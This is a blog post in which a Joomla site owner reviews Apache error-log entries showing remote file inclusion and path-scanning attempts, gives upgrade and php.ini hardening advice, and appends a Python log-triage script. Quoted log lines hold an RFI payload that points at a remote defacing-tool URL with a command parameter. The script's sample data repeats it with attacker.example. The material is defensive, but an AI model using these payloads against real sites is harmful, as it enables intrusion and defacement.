I've already tried to reduce the attack surface of my homepage by removing all unneeded components, modules and mambots, but below is what I found in the log files...

Hackers trying remote code injection

Found more than once in the Apache error.log:

[Thu Aug 17 17:29:05 2006] [error] [client 81.214.151.223] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0

Remember: you should update the following components to their latest version as soon as possible:
  • com_securityimages < 3.0.5: use at least a version > 3.0.6
  • com_hashcash < 1.2.1: use at least a version > 1.2.2
  • com_bayesiannaivefilter was developed but never released as a component; it is still available in the Joomla forge developer tree.
This attack passes a remote URL in the mosConfig_absolute_path parameter, trying to make the server execute a script located at http://recon.reschat.dk/images/gallery/tool25.txt. If you go there, you'll find that the script is readable and contains a header:
Defacing Tool 2.0 by xxxxxx
"Defacing Tool 2.0 by xxxxxxx" is a suite of PHP-based scripts that allows the attacker to send commands to the server, primarily with the intent to deface websites.

Solutions:
  1. For com_bayesiannaivefilter: sorry guys, but I do not have this plugin, nor has it ever been released in the wild. For com_securityimages or com_hashcash, just upgrade!
  2. If you manage a web host that you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file (/etc/php.ini) by modifying the following variable: allow_url_fopen = Off

Hackers trying to access well-known PHP files

Each line below appeared more than 500 times in one day:

[Fri Aug 11 19:11:50 2006] [error] [client 221.87.148.77] Directory index forbidden by rule: /var/www/vhosts/waltercedric.com/httpdocs/components/com_htmlarea3_xtd-c/popups/ImageManager/
[Mon Jul 31 13:07:12 2006] [error] [client 85.108.201.139] user  not found: /administrator/components/com_bayesiannaivefilter/lang.php
[Mon Jul 31 13:07:19 2006] [error] [client 85.108.201.139] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch
[Sat Feb 18 21:44:47 2006] [error] [client 80.218.20.20] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan

Hackers trying to access files that do not exist
  • /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/com_hashcash
  • wiki/administrator/
  • [Tue Aug 01 21:09:46 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_uhp/uhp_config.php
  • [Tue Aug 01 20:43:03 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_colophon/admin.colophon.php
  • [Mon Jul 31 20:11:25 2006] [error] [client 88.233.220.125] user  not found: /administrator/components/com_mgm/help.mgm.php
These look like programs brute-forcing a rule-based set of paths, searching for well-known vulnerabilities.

Some strange attempts...

[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice
[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/_vti_bin
[Mon Jul 31 16:58:44 2006] [error] [client 207.46.98.40] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/demo/httpdocs/function.fopen
[Fri Jul 28 23:04:35 2006] [error] [client 85.103.107.26] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/path=attacker-example.com
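
As an added example (not part of the original post), here is a small Python triage script for error.log lines in the format shown above. It flags requests whose query parameter carries a remote URL and lists clients that probed several distinct missing paths; the sample lines, IP addresses, host names and the threshold of 2 are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Apache error.log line as shown above: [timestamp] [level] [client ip] message
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[^\]]+)\] (?P<msg>.*)$")
# Parameter value that starts with a remote URL scheme (remote-include pattern)
REMOTE_VALUE_RE = re.compile(r"^\W*(?:https?|ftp)://", re.I)
# Messages that indicate a request for something that is not there
PROBE_PREFIXES = ("File does not exist:", "user  not found:", "Directory index forbidden")

# Constructed sample lines modelled on the entries above (documentation IPs, example hosts)
SAMPLE = """\
[Thu Aug 17 17:29:05 2006] [error] [client 192.0.2.10] Invalid URI in request GET administrator/components/com_example/lang.php?mosConfig_absolute_path=http://attacker.example/tool.txt?cmd=id HTTP/1.0
[Tue Aug 01 21:09:46 2006] [error] [client 192.0.2.20] user  not found: /administrator/components/com_a/config.php
[Tue Aug 01 21:09:50 2006] [error] [client 192.0.2.20] user  not found: /administrator/components/com_b/admin.php
[Tue Aug 01 18:48:47 2006] [error] [client 192.0.2.30] File does not exist: /var/www/example/httpdocs/_vti_bin
"""

def remote_include_params(msg):
    """Return (param, value) pairs of a logged request whose value is a remote URL."""
    m = re.search(r"\b(?:GET|POST|HEAD) (\S+)", msg)
    if not m:
        return []
    query = m.group(1).partition("?")[2]  # everything after the first '?'
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_VALUE_RE.match(v)]

def analyze(text, probe_threshold=2):
    """Split error.log text into remote-include attempts and per-client path probes."""
    rfi, probes = [], defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an error.log entry in the expected format
        ip, msg = m["ip"], m["msg"]
        rfi.extend((ip, param, value) for param, value in remote_include_params(msg))
        if msg.startswith(PROBE_PREFIXES):
            # keep only the path, dropping a trailing ", referer: ..." if present
            probes[ip].add(msg.partition(": ")[2].split(",")[0])
    # a client asking for several distinct missing paths looks like a scanner
    scanners = {ip: sorted(p) for ip, p in probes.items() if len(p) >= probe_threshold}
    return rfi, scanners

if __name__ == "__main__":
    attempts, scanners = analyze(SAMPLE)
    print("remote-include attempts:", attempts)
    print("probable scanners:", scanners)
```
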
